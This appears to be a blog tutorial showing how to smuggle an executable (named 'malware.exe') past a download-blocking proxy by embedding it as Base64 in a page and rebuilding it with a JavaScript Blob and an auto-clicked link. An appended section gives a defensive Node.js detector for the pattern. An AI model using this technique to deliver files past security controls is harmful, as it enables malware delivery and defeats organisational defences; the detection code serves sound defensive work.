Bypass Download Restriction with JavaScript Blob
In this blog post, we're going to bypass a download restriction with a JavaScript Blob.
Sometimes proxies might disallow downloading executable files. When you send an HTTP GET request to /malware.exe, the proxy catches and drops the request. Fortunately, there's been a workaround since HTML5: the file is rebuilt inside the browser from data embedded in the page, so no request for the executable itself ever crosses the proxy.

Steps to Bypass The Restriction
1. Convert the executable file to Base64.
2. Copy the Base64 string and assign it to a JavaScript variable.
3. Write a function which converts Base64 to binary.
4. Convert the Base64 string with the function.
5. Create an "octet/stream" type blob.
6. Create an object URL.
7. Create a link (a). (This step can be omitted if you already have a link tag.)
8. Edit href and download attributes of the link.
9. Click the link automatically.
10. To clean up, revoke the URL you created.
What is Blob?
The Blob object represents a blob, which is a file-like object of immutable, raw data; they can be read as text or binary data, or converted into a ReadableStream so its methods can be used for processing the data.
Step #1 - Convert The Executable File
If you have access to Bash, you can use the base64 command to convert an executable file to a Base64 string.
base64 -w0 malware.exe
Step #2, 3, 4
window.atob => Decodes a Base64-encoded ASCII string into a binary string.
charCodeAt => Returns the UTF-16 code unit of the character at the given index.
var base64toArrayBuffer = (b64) => {
    // Decode the Base64 string into a binary string (one character per byte).
    let binaryStr = window.atob(b64);
    let lenOfBinaryStr = binaryStr.length;
    let bytes = new Uint8Array(lenOfBinaryStr);
    // Copy each character code (0-255) into the byte array.
    for (let i = 0; i < lenOfBinaryStr; i++)
        bytes[i] = binaryStr.charCodeAt(i);
    return bytes;
};
var b64 = "aGVsbG8gd29ybGQK...";
var bytes = base64toArrayBuffer(b64);
Step #5 - Create a Blob
-- snippet --
var bytes = base64toArrayBuffer(b64);
var blob = new Blob([bytes], {type: "octet/stream"});
Step #6 - Create an Object URL
-- snippet --
var blob = new Blob([bytes], {type: "octet/stream"});
var fileName = 'malware.exe';
var url = window.URL.createObjectURL(blob);
Step #7, 8 - Create a Link
-- snippet --
var link = document.createElement("a");
link.href = url; // reuse the object URL from step 6 so the same URL can be revoked later
link.download = fileName;
document.body.appendChild(link);
If you check the DOM, you can examine the created link.

Step #9, 10
-- snippet --
var link = document.createElement("a");
link.href = url; // reuse the object URL from step 6 so the revoke below releases it
link.download = fileName;
document.body.appendChild(link);
link.click();
window.URL.revokeObjectURL(url);
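Because the file never appears as its own HTTP response, a proxy or mail gateway has to inspect the page source instead. The following is an added example (not code from the original post) of a static check for the steps above, run under Node.js; the indicator set, the 64-character minimum and the verdict rules are assumptions chosen for illustration.

```javascript
// Added example (not from the original post): static triage of page source
// for the Blob download pattern. Indicator set and verdict rules are assumptions.
const INDICATORS = [
  { name: "atob",            re: /\batob\s*\(/ },
  { name: "blob",            re: /new\s+Blob\s*\(/ },
  { name: "createObjectURL", re: /\bcreateObjectURL\s*\(/ },
  { name: "download",        re: /\.download\s*=|\bdownload\s*=\s*["']/ },
  { name: "click",           re: /\.click\s*\(\s*\)/ },
];

// File signatures compared against the decoded start of each Base64 literal.
const MAGIC = [
  { type: "PE (MZ)", bytes: [0x4d, 0x5a] },
  { type: "ELF",     bytes: [0x7f, 0x45, 0x4c, 0x46] },
  { type: "ZIP",     bytes: [0x50, 0x4b, 0x03, 0x04] },
];

// Find quoted Base64 literals of at least minLen characters and sniff their type.
function findEmbeddedPayloads(source, minLen = 64) {
  const re = new RegExp(`["']([A-Za-z0-9+/]{${minLen},}={0,2})["']`, "g");
  const found = [];
  for (const m of source.matchAll(re)) {
    // The first 8 Base64 characters decode to 6 bytes, enough for the signatures.
    const head = Buffer.from(m[1].slice(0, 8), "base64");
    const hit = MAGIC.find(sig => sig.bytes.every((b, i) => head[i] === b));
    found.push({ length: m[1].length, type: hit ? hit.type : "unknown" });
  }
  return found;
}

// "block" when the decode -> Blob -> object URL chain carries a recognised file,
// "review" when the chain carries an unidentified literal, otherwise "allow".
function triage(source) {
  const apis = INDICATORS.filter(i => i.re.test(source)).map(i => i.name);
  const payloads = findEmbeddedPayloads(source);
  const executable = payloads.some(p => p.type !== "unknown");
  const chain = ["atob", "blob", "createObjectURL"].every(a => apis.includes(a));
  const verdict = chain && executable ? "block" : chain && payloads.length ? "review" : "allow";
  return { apis, payloads, verdict };
}

// Constructed sample: the page's pattern with a literal whose first bytes decode to "MZ".
const SAMPLE = `var b64 = "TVqQ${"A".repeat(80)}";
function base64toArrayBuffer(s) { return window.atob(s); }
var blob = new Blob([base64toArrayBuffer(b64)], {type: "octet/stream"});
link.href = window.URL.createObjectURL(blob); link.download = "x"; link.click();`;
console.log(triage(SAMPLE));
```

A string match like this only catches the plain form shown in this post, so treat it as one signal alongside endpoint controls that inspect the file once the browser writes it to disk.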